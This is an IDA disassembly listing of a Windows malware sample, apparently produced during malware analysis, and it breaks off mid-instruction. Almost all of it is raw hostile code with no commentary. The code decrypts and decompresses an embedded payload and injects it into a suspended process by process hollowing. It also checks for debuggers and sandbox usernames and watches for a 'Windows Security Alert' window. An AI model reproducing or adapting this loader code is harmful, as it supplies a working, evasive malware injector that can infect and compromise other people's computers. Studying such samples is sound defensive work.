; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 | ; +-------------------------------------------------------------------------+ ; ; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 | ; +-------------------------------------------------------------------------+ ; ; Input MD5 : 9A52679900ACA1F1A2530E4D52135201 ; File Name : u:\work\9a52679900aca1f1a2530e4d52135201_orig.exe ; Format : Portable executable for 80386 (PE) ; Imagebase : 400000 ; Section 1. (virtual address 00001000) ; Virtual size : 000048AF ( 18607.) ; Section size in file : 00004A00 ( 18944.) 
; Offset to raw data for section: 00000400 ; Flags 60000020: Text Executable Readable ; Alignment : default ; OS type : MS Windows ; Application type: Executable 32bit include uni.inc ; see unicode subdir of ida for info on unicode .686p .mmx .model flat ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Execute _text segment para public 'CODE' use32 assume cs:_text ;org 401000h assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_401000 proc near ; CODE XREF: sub_401881+CAp var_10 = byte ptr -10h var_C = byte ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 10h push esi mov esi, [ebp+arg_8] imul esi, 64h inc esi push esi ; Size call _malloc test eax, eax pop ecx mov [ebp+var_8], eax jz short loc_401086 push ebx push offset LibFileName ; "ntdll.dll" call ds:LoadLibraryA ; LoadLibraryA mov ebx, eax test ebx, ebx jz short loc_401083 push edi mov edi, ds:GetProcAddress push offset ProcName ; "RtlDecompressBuffer" push ebx ; hModule call edi ; GetProcAddress push offset aRtlgetcompress ; "RtlGetCompressionWorkSpaceSize" push ebx ; hModule mov [ebp+var_4], eax call edi ; GetProcAddress cmp [ebp+arg_8], 0 pop edi jz short loc_401083 cmp [ebp+var_4], 0 jz short loc_401083 test eax, eax jz short loc_401083 lea ecx, [ebp+var_C] push ecx lea ecx, [ebp+var_10] push ecx push 2 call eax push [ebp+arg_C] push [ebp+arg_8] push [ebp+arg_0] push esi push [ebp+var_8] push 2 call [ebp+var_4] push ebx ; hLibModule call ds:FreeLibrary ; FreeLibrary mov eax, [ebp+var_8] jmp short loc_401085 ; --------------------------------------------------------------------------- loc_401083: ; CODE XREF: sub_401000+2Cj ; sub_401000+4Dj ... 
xor eax, eax loc_401085: ; CODE XREF: sub_401000+81j pop ebx loc_401086: ; CODE XREF: sub_401000+1Aj pop esi leave retn sub_401000 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame ; int __cdecl sub_401089(char *Str, int, int) sub_401089 proc near ; CODE XREF: sub_401881+B5p ; sub_401881+D8p var_210 = byte ptr -210h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 Str = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 210h mov eax, [ebp+arg_8] push esi lea esi, [eax+eax*4] push edi shl esi, 1 push esi ; Size call _malloc xor edi, edi cmp eax, edi pop ecx mov [ebp+var_C], eax jnz short loc_4010B3 xor eax, eax jmp loc_40119F ; --------------------------------------------------------------------------- loc_4010B3: ; CODE XREF: sub_401089+21j push esi ; Size push edi ; Val push eax ; Dst call _memset add esp, 0Ch xor eax, eax loc_4010C0: ; CODE XREF: sub_401089+44j mov [ebp+eax+var_210], al inc eax cmp eax, 0FFh jle short loc_4010C0 mov [ebp+var_8], edi mov [ebp+var_4], edi mov esi, 100h push ebx loc_4010DB: ; CODE XREF: sub_401089+9Ej mov edi, [ebp+var_4] push [ebp+Str] ; Str lea edi, [ebp+edi+var_210] mov bl, [edi] call _strlen xor edx, edx pop ecx mov ecx, eax mov eax, [ebp+var_4] div ecx mov eax, [ebp+Str] movsx ecx, byte ptr [edx+eax] add ecx, [ebp+var_8] movzx eax, bl add eax, ecx cdq mov ecx, esi idiv ecx inc [ebp+var_4] cmp [ebp+var_4], 0FFh lea eax, [ebp+edx+var_210] mov cl, [eax] mov [edi], cl mov [ebp+var_8], edx mov [eax], bl jle short loc_4010DB xor eax, eax cmp [ebp+arg_8], eax mov [ebp+var_8], eax mov [ebp+var_4], eax jle short loc_40119B mov eax, [ebp+arg_4] sub eax, [ebp+var_C] mov [ebp+var_10], eax loc_40113F: ; CODE XREF: sub_401089+110j mov eax, [ebp+var_4] cdq mov ecx, esi idiv ecx mov edi, esi lea ecx, [ebp+edx+var_210] mov bl, [ecx] movzx eax, bl add eax, [ebp+var_8] cdq idiv edi lea eax, [ebp+edx+var_210] 
mov [ebp+var_8], edx mov dl, [eax] mov [ecx], dl mov edx, [ebp+var_C] mov [eax], bl mov eax, [ebp+var_4] lea edi, [eax+edx] movzx eax, byte ptr [ecx] movzx ecx, bl add eax, ecx cdq mov ecx, esi idiv ecx mov ecx, [ebp+var_10] mov al, [ebp+edx+var_210] xor al, [ecx+edi] inc [ebp+var_4] mov [edi], al mov eax, [ebp+var_4] cmp eax, [ebp+arg_8] jl short loc_40113F loc_40119B: ; CODE XREF: sub_401089+ABj mov eax, [ebp+var_C] pop ebx loc_40119F: ; CODE XREF: sub_401089+25j pop edi pop esi leave retn sub_401089 endp ; =============== S U B R O U T I N E ======================================= sub_4011A3 proc near ; CODE XREF: sub_4011C8+5Bp ; sub_4011C8+AEp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 xor eax, eax cmp [esp+arg_4], eax jle short locret_4011C7 mov ecx, [esp+arg_0] mov edx, dword_4082C4 add ecx, edx loc_4011B7: ; CODE XREF: sub_4011A3+22j mov dl, [ecx+eax] mov byte_408300[eax], dl inc eax cmp eax, [esp+arg_4] jl short loc_4011B7 locret_4011C7: ; CODE XREF: sub_4011A3+6j retn sub_4011A3 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4011C8 proc near ; CODE XREF: WinMain(x,x,x,x)+A8p var_13C = byte ptr -13Ch Dst = byte ptr -5Ch var_20 = dword ptr -20h var_1C = byte ptr -1Ch var_16 = word ptr -16h var_8 = word ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp sub esp, 13Ch mov eax, dword_408040 mov ecx, dword_4082C4 push ebx push esi lea esi, [ecx+eax] mov bl, [esi] mov byte_4082CC, bl mov cl, [esi+1] push edi mov edi, nNumberOfBytesToRead mov byte_4082FC, cl mov cl, [esi+2] neg byte_4082FC sub edi, eax neg bl neg cl cmp edi, 40h mov byte_4082CC, bl mov byte_4082C0, cl jb loc_4012BE add eax, 3 push 40h push eax call sub_4011A3 pop ecx pop ecx mov byte_408340, 0 xor esi, esi loc_401233: ; CODE XREF: sub_4011C8+81j mov cl, byte_4082FC lea eax, dword_408301[esi] add [eax-1], bl add [eax], cl inc esi inc esi cmp 
esi, 40h jb short loc_401233 push 40h ; Size mov ebx, offset byte_408300 lea eax, [ebp+Dst] push ebx ; Src push eax ; Dst call _memcpy mov eax, [ebp+var_20] lea ecx, [eax+18h] add esp, 0Ch cmp edi, ecx jb short loc_4012BE mov ecx, dword_408040 lea eax, [ecx+eax+3] push 18h push eax call sub_4011A3 pop ecx pop ecx mov byte_408318, 0 xor esi, esi loc_401286: ; CODE XREF: sub_4011C8+DAj mov cl, byte_4082CC lea eax, dword_408301[esi] add [eax-1], cl mov cl, byte_4082FC add [eax], cl inc esi inc esi cmp esi, 18h jb short loc_401286 push 18h ; Size lea eax, [ebp+var_1C] push ebx ; Src push eax ; Dst call _memcpy mov esi, 0E0h add esp, 0Ch cmp [ebp+var_8], si jz short loc_4012C5 loc_4012BE: ; CODE XREF: sub_4011C8+4Fj ; sub_4011C8+9Fj xor al, al jmp loc_4013AB ; --------------------------------------------------------------------------- loc_4012C5: ; CODE XREF: sub_4011C8+F4j mov ecx, dword_408040 mov eax, [ebp+var_20] lea eax, [ecx+eax+1Bh] push esi push eax call sub_4011A3 pop ecx pop ecx mov byte_4083E0, 0 xor edi, edi loc_4012E4: ; CODE XREF: sub_4011C8+137j mov cl, byte_4082CC lea eax, dword_408301[edi] add [eax-1], cl mov cl, byte_4082FC add [eax], cl inc edi inc edi cmp edi, esi jb short loc_4012E4 push esi ; Size lea eax, [ebp+var_13C] push ebx ; Src push eax ; Dst call _memcpy movzx eax, [ebp+var_16] lea eax, [eax+eax*4] shl eax, 3 push eax ; dwBytes call ??2@YAPAXI@Z ; operator new(uint) movzx esi, [ebp+var_16] mov ecx, dword_408040 mov [ebp+var_4], eax mov eax, [ebp+var_20] lea esi, [esi+esi*4] shl esi, 3 lea eax, [ecx+eax+0FBh] push esi push eax call sub_4011A3 add esp, 18h xor edi, edi test esi, esi mov byte_408300[esi], 0 jbe short loc_401370 loc_401353: ; CODE XREF: sub_4011C8+1A6j mov cl, byte_4082CC lea eax, dword_408301[edi] add [eax-1], cl mov cl, byte_4082FC add [eax], cl inc edi inc edi cmp edi, esi jb short loc_401353 loc_401370: ; CODE XREF: sub_4011C8+189j push esi ; Size push ebx ; Src push [ebp+var_4] ; Dst call _memcpy mov edi, [ebp+arg_0] mov 
eax, [ebp+arg_10] add esp, 0Ch push 10h pop ecx push 6 lea esi, [ebp+Dst] rep movsd mov edi, [ebp+arg_8] pop ecx lea esi, [ebp+var_1C] rep movsd mov edi, [ebp+arg_C] push 38h pop ecx lea esi, [ebp+var_13C] rep movsd mov ecx, [ebp+var_4] mov [eax], ecx mov al, 1 loc_4013AB: ; CODE XREF: sub_4011C8+F8j pop edi pop esi pop ebx leave retn sub_4011C8 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4013B0 proc near ; CODE XREF: WinMain(x,x,x,x)+CAp arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp mov eax, [ebp+arg_8] mov ecx, [eax+3Ch] push esi mov esi, [eax+20h] xor edx, edx mov eax, ecx div esi test edx, edx jz short loc_4013CD lea ecx, [eax+1] imul ecx, esi loc_4013CD: ; CODE XREF: sub_4013B0+15j mov eax, [ebp+arg_4] movzx eax, word ptr [eax+6] test eax, eax jle short loc_401406 push ebx mov ebx, [ebp+arg_C] push edi add ebx, 8 mov [ebp+arg_8], eax loc_4013E3: ; CODE XREF: sub_4013B0+52j mov edi, [ebx] test edi, edi jz short loc_4013FC xor edx, edx mov eax, edi div esi test edx, edx jnz short loc_4013F7 add ecx, edi jmp short loc_4013FC ; --------------------------------------------------------------------------- loc_4013F7: ; CODE XREF: sub_4013B0+41j imul eax, esi add ecx, eax loc_4013FC: ; CODE XREF: sub_4013B0+37j ; sub_4013B0+45j add ebx, 28h dec [ebp+arg_8] jnz short loc_4013E3 pop edi pop ebx loc_401406: ; CODE XREF: sub_4013B0+26j mov eax, ecx pop esi pop ebp retn sub_4013B0 endp ; =============== S U B R O U T I N E ======================================= sub_40140B proc near ; CODE XREF: sub_401425+A9p ; sub_401425+12Dp ... 
arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov eax, [esp+arg_0] xor edx, edx div [esp+arg_4] test edx, edx jnz short loc_40141E mov eax, [esp+arg_0] retn ; --------------------------------------------------------------------------- loc_40141E: ; CODE XREF: sub_40140B+Cj inc eax imul eax, [esp+arg_4] retn sub_40140B endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame ; int __cdecl sub_401425(int, int, int, size_t Size, int, void *Dst) sub_401425 proc near ; CODE XREF: WinMain(x,x,x,x)+FAp arg_4 = dword ptr 0Ch Size = dword ptr 14h arg_10 = dword ptr 18h Dst = dword ptr 1Ch push ebp mov ebp, esp mov eax, dword_4082C4 push ebx push esi mov esi, dword_408040 add eax, esi mov bl, [eax] mov byte_4082CC, bl mov cl, [eax+1] mov byte_4082FC, cl mov al, [eax+2] neg byte_4082FC neg al mov byte_4082C0, al mov eax, [ebp+Size] neg bl mov byte_4082CC, bl push edi mov edi, [eax+3Ch] mov eax, [ebp+arg_4] movzx eax, word ptr [eax+6] test eax, eax jle short loc_401486 mov ecx, [ebp+arg_10] add ecx, 14h loc_401478: ; CODE XREF: sub_401425+5Fj mov edx, [ecx] cmp edx, edi jnb short loc_401480 mov edi, edx loc_401480: ; CODE XREF: sub_401425+57j add ecx, 28h dec eax jnz short loc_401478 loc_401486: ; CODE XREF: sub_401425+4Bj push edi add esi, 3 push esi call sub_4011A3 pop ecx xor esi, esi test edi, edi pop ecx mov byte_408300[edi], 0 jbe short loc_4014B6 loc_40149F: ; CODE XREF: sub_401425+8Fj mov cl, byte_4082FC lea eax, dword_408301[esi] add [eax-1], bl add [eax], cl inc esi inc esi cmp esi, edi jb short loc_40149F loc_4014B6: ; CODE XREF: sub_401425+78j push edi ; Size push offset byte_408300 ; Src push [ebp+Dst] ; Dst call _memcpy mov ebx, [ebp+Size] mov ecx, [ebx+20h] push ecx push dword ptr [ebx+3Ch] call sub_40140B mov edi, eax add edi, [ebp+Dst] mov eax, [ebp+arg_4] and [ebp+Dst], 0 add esp, 14h cmp word ptr [eax+6], 0 jbe loc_401584 mov esi, [ebp+arg_10] add esi, 8 loc_4014F3: ; CODE XREF: sub_401425+159j mov eax, 
[esi+8] test eax, eax jbe short loc_40155C mov [ebp+Size], eax mov eax, [esi] cmp [ebp+Size], eax jbe short loc_401507 mov [ebp+Size], eax loc_401507: ; CODE XREF: sub_401425+DDj mov eax, [esi+0Ch] mov ecx, dword_408040 push [ebp+Size] lea eax, [eax+ecx+3] push eax call sub_4011A3 mov eax, [ebp+Size] pop ecx pop ecx xor ecx, ecx test eax, eax mov byte_408300[eax], 0 jbe short loc_401540 loc_40152F: ; CODE XREF: sub_401425+119j mov dl, byte_4082C0 add byte_408300[ecx], dl inc ecx cmp ecx, eax jb short loc_40152F loc_401540: ; CODE XREF: sub_401425+108j push eax ; Size push offset byte_408300 ; Src push edi ; Dst call _memcpy mov ecx, [ebx+20h] push ecx push dword ptr [esi] call sub_40140B add esp, 14h jmp short loc_40156C ; --------------------------------------------------------------------------- loc_40155C: ; CODE XREF: sub_401425+D3j mov eax, [esi] test eax, eax jz short loc_40156E push ecx push eax call sub_40140B add esp, 8 loc_40156C: ; CODE XREF: sub_401425+135j add edi, eax loc_40156E: ; CODE XREF: sub_401425+13Bj mov eax, [ebp+arg_4] movzx eax, word ptr [eax+6] inc [ebp+Dst] add esi, 28h cmp [ebp+Dst], eax jl loc_4014F3 loc_401584: ; CODE XREF: sub_401425+C2j pop edi pop esi mov al, 1 pop ebx pop ebp retn sub_401425 endp ; =============== S U B R O U T I N E ======================================= sub_40158B proc near ; CODE XREF: sub_4016EE+BDp arg_8 = dword ptr 0Ch arg_10 = dword ptr 14h arg_14 = dword ptr 18h mov ecx, [esp+arg_8] mov eax, [ecx+88h] test eax, eax jz short locret_4015FA cmp dword ptr [ecx+8Ch], 0 jz short locret_4015FA mov edx, [esp+arg_10] push esi mov esi, [esp+4+arg_14] sub esi, [ecx+1Ch] add eax, edx cmp dword ptr [eax+4], 0 jz short loc_4015F9 push ebx push edi loc_4015B8: ; CODE XREF: sub_40158B+6Aj mov ecx, [eax+4] sub ecx, 8 shr ecx, 1 test ecx, ecx lea edi, [eax+8] jle short loc_4015EF mov ebx, ecx loc_4015C9: ; CODE XREF: sub_40158B+62j xor edx, edx mov dx, [edi] mov ecx, edx and ecx, 0FFFh add ecx, [esp+0Ch+arg_10] and dx, 
0F000h add ecx, [eax] cmp dx, 3000h jnz short loc_4015EA add [ecx], esi loc_4015EA: ; CODE XREF: sub_40158B+5Bj inc edi inc edi dec ebx jnz short loc_4015C9 loc_4015EF: ; CODE XREF: sub_40158B+3Aj cmp dword ptr [edi+4], 0 mov eax, edi jnz short loc_4015B8 pop edi pop ebx loc_4015F9: ; CODE XREF: sub_40158B+29j pop esi locret_4015FA: ; CODE XREF: sub_40158B+Cj ; sub_40158B+15j retn sub_40158B endp ; =============== S U B R O U T I N E ======================================= ; int __cdecl sub_4015FB(int, HANDLE hProcess, LPCVOID lpAddress, SIZE_T dwLength) sub_4015FB proc near ; CODE XREF: sub_401613+A1p hProcess = dword ptr 8 lpAddress = dword ptr 0Ch dwLength = dword ptr 10h push [esp+dwLength] ; dwLength push offset Buffer ; lpBuffer push [esp+8+lpAddress] ; lpAddress push [esp+0Ch+hProcess] ; hProcess call ds:VirtualQueryEx ; VirtualQueryEx retn sub_4015FB endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame ; int __cdecl sub_401613(LPSTR lpCommandLine, LPPROCESS_INFORMATION lpProcessInformation, int, LPCONTEXT lpContext, int) sub_401613 proc near ; CODE XREF: WinMain(x,x,x,x)+117p StartupInfo = _STARTUPINFOA ptr -48h var_4 = byte ptr -4 lpCommandLine = dword ptr 8 lpProcessInformation= dword ptr 0Ch lpContext = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp sub esp, 48h push esi mov esi, [ebp+lpProcessInformation] push edi push 10h pop ecx xor edx, edx push esi ; lpProcessInformation xor eax, eax mov [ebp+StartupInfo.cb], edx lea edi, [ebp+StartupInfo.lpReserved] rep stosd lea eax, [ebp+StartupInfo] push eax ; lpStartupInfo push edx ; lpCurrentDirectory push edx ; lpEnvironment push 4 ; dwCreationFlags push edx ; bInheritHandles push edx ; lpThreadAttributes push edx ; lpProcessAttributes push [ebp+lpCommandLine] ; lpCommandLine push edx ; lpApplicationName call ds:CreateProcessA ; CreateProcessA test eax, eax jz loc_4016CB mov edi, [ebp+lpContext] push ebx push edi ; lpContext mov dword ptr 
[edi], 10007h push dword ptr [esi+4] ; hThread call ds:GetThreadContext ; GetThreadContext mov ebx, [ebp+arg_10] lea eax, [ebp+var_4] push eax mov eax, [edi+0A4h] push 4 push ebx add eax, 8 push eax push dword ptr [esi] call dword_4362C4 ; ReadProcessMemory mov edi, [ebx] jmp short loc_4016AD ; --------------------------------------------------------------------------- loc_40167F: ; CODE XREF: sub_401613+ABj cmp Buffer.State, 10000h jz short loc_4016C0 cmp edi, 0D7E9Bh jnz short loc_4016A7 push 11h ; uType push offset Caption ; "f78ret64375u435r q43tr67fstgdyfsew6r65f"... push offset Text ; "mnbbntrew t regfsdhfiasjdkfjasopdifisdu"... push 0 ; hWnd call ds:MessageBoxA ; MessageBoxA loc_4016A7: ; CODE XREF: sub_401613+7Ej add edi, Buffer.RegionSize loc_4016AD: ; CODE XREF: sub_401613+6Aj push 1Ch ; dwLength push edi ; lpAddress push dword ptr [esi] ; hProcess push 0 ; int call sub_4015FB add esp, 10h test eax, eax jnz short loc_40167F loc_4016C0: ; CODE XREF: sub_401613+76j sub edi, [ebx] xor eax, eax mov [ebx+4], edi inc eax pop ebx jmp short loc_4016CD ; --------------------------------------------------------------------------- loc_4016CB: ; CODE XREF: sub_401613+32j xor eax, eax loc_4016CD: ; CODE XREF: sub_401613+B6j pop edi pop esi leave retn sub_401613 endp ; =============== S U B R O U T I N E ======================================= sub_4016D1 proc near ; CODE XREF: sub_4016EE+83p arg_0 = dword ptr 4 mov eax, [esp+arg_0] cmp dword ptr [eax+88h], 0 jz short loc_4016EB cmp dword ptr [eax+8Ch], 0 jz short loc_4016EB xor eax, eax inc eax retn ; --------------------------------------------------------------------------- loc_4016EB: ; CODE XREF: sub_4016D1+Bj ; sub_4016D1+14j xor eax, eax retn sub_4016D1 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4016EE proc near ; CODE XREF: WinMain(x,x,x,x)+17Bp arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch flOldProtect = dword ptr 14h arg_10 = dword ptr 18h 
arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h hProcess = dword ptr 28h arg_24 = dword ptr 2Ch arg_30 = dword ptr 38h arg_D4 = dword ptr 0DCh arg_E0 = dword ptr 0E8h lpAddress = dword ptr 304h dwSize = dword ptr 308h push ebp mov ebp, esp mov eax, [ebp+lpAddress] push ebx mov ebx, [ebp+flOldProtect] cmp [ebx+1Ch], eax push esi mov esi, ds:VirtualAllocEx push edi mov edi, 3000h jnz short loc_401730 mov ecx, [ebp+dwSize] cmp [ebp+arg_18], ecx ja short loc_401730 lea edx, [ebp+flOldProtect] push edx ; lpflOldProtect push 40h ; flNewProtect push ecx ; dwSize push eax ; lpAddress push [ebp+hProcess] ; hProcess mov dword_4362C0, eax call ds:VirtualProtectEx ; VirtualProtectEx jmp short loc_401767 ; --------------------------------------------------------------------------- loc_401730: ; CODE XREF: sub_4016EE+1Dj ; sub_4016EE+28j mov ecx, [ebp+hProcess] push eax push ecx mov dword_4082F8, ecx mov dword_4362A8, eax call dword_4362C8 ; ZwUnmapViewOfSection test eax, eax jnz short loc_40174E mov byte ptr [ebp+flOldProtect+3], 1 loc_40174E: ; CODE XREF: sub_4016EE+5Aj cmp byte ptr [ebp+flOldProtect+3], 1 jnz short loc_401767 push 40h ; flProtect push edi ; flAllocationType push [ebp+arg_18] ; dwSize push dword ptr [ebx+1Ch] ; lpAddress push [ebp+hProcess] ; hProcess call esi ; VirtualAllocEx mov dword_4362C0, eax loc_401767: ; CODE XREF: sub_4016EE+40j ; sub_4016EE+64j cmp dword_4362C0, 0 jnz short loc_4017C0 push ebx call sub_4016D1 add esp, 4 test eax, eax jz loc_40184E push 40h ; flProtect push edi ; flAllocationType push [ebp+arg_18] ; dwSize push 0 ; lpAddress push [ebp+hProcess] ; hProcess call esi ; VirtualAllocEx test eax, eax mov dword_4362C0, eax jz loc_40184E push 0 push eax push [ebp+arg_14] push [ebp+arg_10] push ebx push [ebp+arg_4] push [ebp+arg_0] call sub_40158B add esp, 1Ch cmp dword_4362C0, 0 jz loc_40184E loc_4017C0: ; CODE XREF: sub_4016EE+80j mov esi, [ebp+arg_D4] push offset aWriteprocessme ; "WriteProcessMemory" push offset ModuleName ; "kernel32.dll" 
call ds:GetModuleHandleA ; GetModuleHandleA push eax ; hModule call ds:GetProcAddress ; GetProcAddress push 0 push 4 push offset dword_4362C0 add esi, 8 push esi mov esi, [ebp+hProcess] push esi call eax mov eax, [ebp+arg_0] mov eax, [eax+3Ch] mov ecx, dword_4362C0 mov edx, [ebp+arg_14] mov [eax+edx+34h], ecx mov eax, dword_4362C0 cmp eax, [ebp+lpAddress] mov [ebp+arg_30], 10007h jnz short loc_401825 mov eax, [ebx+10h] add eax, [ebx+1Ch] mov [ebp+arg_E0], eax jmp short loc_401830 ; --------------------------------------------------------------------------- loc_401825: ; CODE XREF: sub_4016EE+127j mov ecx, [ebx+10h] add ecx, eax mov [ebp+arg_E0], ecx loc_401830: ; CODE XREF: sub_4016EE+135j mov eax, [ebp+arg_24] lea ecx, [ebp+arg_30] push ecx push eax mov dword_4362B4, esi mov hThread, eax call dword_4362CC ; SetThreadContext xor eax, eax inc eax jmp short loc_401850 ; --------------------------------------------------------------------------- loc_40184E: ; CODE XREF: sub_4016EE+8Dj ; sub_4016EE+A7j ... 
xor eax, eax loc_401850: ; CODE XREF: sub_4016EE+15Ej pop edi pop esi pop ebx pop ebp retn sub_4016EE endp ; =============== S U B R O U T I N E ======================================= sub_401855 proc near ; CODE XREF: WinMain(x,x,x,x)+1ADp push hThread ; hThread mov byte_4362B8, 1 call ds:ResumeThread ; ResumeThread retn sub_401855 endp ; =============== S U B R O U T I N E ======================================= sub_401869 proc near ; CODE XREF: sub_401881+5Bp arg_0 = dword ptr 4 mov eax, [esp+arg_0] sub eax, dword_408040 inc eax push eax ; Size call _malloc pop ecx mov dword_4362AC, eax retn sub_401869 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame ; int __cdecl sub_401881(int, LPCSTR lpFileName) sub_401881 proc near ; CODE XREF: WinMain(x,x,x,x)+39p var_8 = dword ptr -8 NumberOfBytesRead= dword ptr -4 lpFileName = dword ptr 0Ch push ebp mov ebp, esp push ecx push ecx push ebx xor ebx, ebx push ebx ; hTemplateFile push 80h ; dwFlagsAndAttributes push 3 ; dwCreationDisposition push ebx ; lpSecurityAttributes push 1 ; dwShareMode push 80000000h ; dwDesiredAccess push [ebp+lpFileName] ; lpFileName call ds:CreateFileA ; CreateFileA push ebx ; lpFileSizeHigh push eax ; hFile mov hFile, eax call ds:GetFileSize ; GetFileSize mov nNumberOfBytesToRead, eax inc eax push eax ; Size call _malloc pop ecx push ebx ; lpOverlapped lea ecx, [ebp+NumberOfBytesRead] push ecx ; lpNumberOfBytesRead push nNumberOfBytesToRead ; nNumberOfBytesToRead mov dword_4082C4, eax push eax ; lpBuffer push hFile ; hFile call ds:ReadFile ; ReadFile push [ebp+NumberOfBytesRead] call sub_401869 mov edx, [ebp+NumberOfBytesRead] mov eax, dword_408040 pop ecx xor ecx, ecx sub edx, eax jz short loc_401913 loc_4018F0: ; CODE XREF: sub_401881+90j mov edx, dword_4082C4 add eax, edx mov al, [eax+ecx] mov edx, dword_4362AC mov [edx+ecx], al mov edx, [ebp+NumberOfBytesRead] mov eax, dword_408040 inc ecx sub edx, eax cmp ecx, edx jb short 
loc_4018F0 loc_401913: ; CODE XREF: sub_401881+6Dj mov ecx, dword_4362AC sub ecx, eax mov eax, [ebp+NumberOfBytesRead] mov [ecx+eax], bl mov eax, [ebp+NumberOfBytesRead] sub eax, dword_408040 push eax ; int push dword_4362AC ; int push offset a6897u546gfd78u ; "6897u546gfd78ui54wn8 gtrewyt rewy tre54"... call sub_401089 lea ecx, [ebp+var_8] push ecx mov ecx, [ebp+NumberOfBytesRead] sub ecx, dword_408040 push ecx push ebx push eax call sub_401000 push [ebp+var_8] ; int push eax ; int push offset a689ytS78eyg67b ; "689yt s78eyg67bsdf67tewa78ytijn4qhkte" call sub_401089 add esp, 28h mov dword_408040, ebx mov dword_4082C4, eax pop ebx leave retn sub_401881 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40196F proc near ; CODE XREF: WinMain(x,x,x,x)+40p String2 = byte ptr -68h pcbBuffer = dword ptr -4 push ebp mov ebp, esp sub esp, 68h push esi push 64h pop esi push esi ; Size lea eax, [ebp+String2] push 0 ; Val push eax ; Dst call _memset add esp, 0Ch lea eax, [ebp+pcbBuffer] push eax ; pcbBuffer lea eax, [ebp+String2] push eax ; lpBuffer mov [ebp+pcbBuffer], esi call ds:GetUserNameA ; GetUserNameA test eax, eax jz short loc_4019C5 mov esi, ds:lstrcmpA lea eax, [ebp+String2] push eax ; lpString2 push offset String1 ; "USER" call esi ; lstrcmpA test eax, eax jz short loc_4019C1 lea eax, [ebp+String2] push eax ; lpString2 push offset aCurrentuser ; "CurrentUser" call esi ; lstrcmpA test eax, eax jnz short loc_4019C5 loc_4019C1: ; CODE XREF: sub_40196F+41j mov al, 1 jmp short loc_4019C7 ; --------------------------------------------------------------------------- loc_4019C5: ; CODE XREF: sub_40196F+2Cj ; sub_40196F+50j xor al, al loc_4019C7: ; CODE XREF: sub_40196F+54j pop esi leave retn sub_40196F endp ; =============== S U B R O U T I N E ======================================= sub_4019CA proc near ; CODE XREF: WinMain(x,x,x,x)+4Dp push 0 ; hTemplateFile push 80h ; dwFlagsAndAttributes push 3 ; 
dwCreationDisposition push 0 ; lpSecurityAttributes push 3 ; dwShareMode push 0C0000000h ; dwDesiredAccess push offset FileName ; "\\\\.\\NTICE" call ds:CreateFileA ; CreateFileA cmp eax, 0FFFFFFFFh jz short loc_4019F7 push eax ; hObject call ds:CloseHandle ; CloseHandle xor eax, eax inc eax retn ; --------------------------------------------------------------------------- loc_4019F7: ; CODE XREF: sub_4019CA+20j xor eax, eax retn sub_4019CA endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4019FA proc near ; CODE XREF: WinMain(x,x,x,x)+5Ap Buffer = byte ptr -1 push ebp mov ebp, esp push ecx push ebx push offset aCreateprocessa ; "CreateProcessA" push offset aKernel32_dll_0 ; "KERNEL32.dll" xor ebx, ebx call ds:GetModuleHandleA ; GetModuleHandleA push eax ; hModule call ds:GetProcAddress ; GetProcAddress push ebx ; lpNumberOfBytesRead push 1 ; nSize lea ecx, [ebp+Buffer] push ecx ; lpBuffer push eax ; lpBaseAddress call ds:GetCurrentProcess ; GetCurrentProcess push eax ; hProcess call ds:ReadProcessMemory ; ReadProcessMemory cmp [ebp+Buffer], 0E9h jnz short loc_401A35 mov bl, 1 loc_401A35: ; CODE XREF: sub_4019FA+37j mov al, bl pop ebx leave retn sub_4019FA endp ; =============== S U B R O U T I N E ======================================= ; DWORD __stdcall StartAddress(LPVOID) StartAddress proc near ; DATA XREF: WinMain(x,x,x,x)+24o push ebx push ebp push esi push edi mov edi, ds:FindWindowA mov ebx, offset WindowName ; "Windows Security Alert" push ebx ; lpWindowName push 0 ; lpClassName call edi ; FindWindowA mov ebp, ds:Sleep jmp short loc_401A5F ; --------------------------------------------------------------------------- loc_401A56: ; CODE XREF: StartAddress+29j push 1Eh ; dwMilliseconds call ebp ; Sleep push ebx ; lpWindowName push 0 ; lpClassName call edi ; FindWindowA loc_401A5F: ; CODE XREF: StartAddress+1Aj mov esi, eax test esi, esi jz short loc_401A56 push 0 ; lParam push 68h ; wParam push 
